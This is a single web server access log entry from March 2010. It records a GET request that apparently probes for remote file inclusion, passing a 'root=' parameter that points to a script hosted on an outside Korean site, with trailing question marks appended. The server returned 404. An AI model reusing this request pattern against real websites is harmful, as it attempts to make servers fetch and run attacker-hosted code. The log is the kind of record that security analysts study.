116.127.121.117 - - [03/Mar/2010:07:28:08 -0800] "GET /logs/access_100203.log%20%20///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
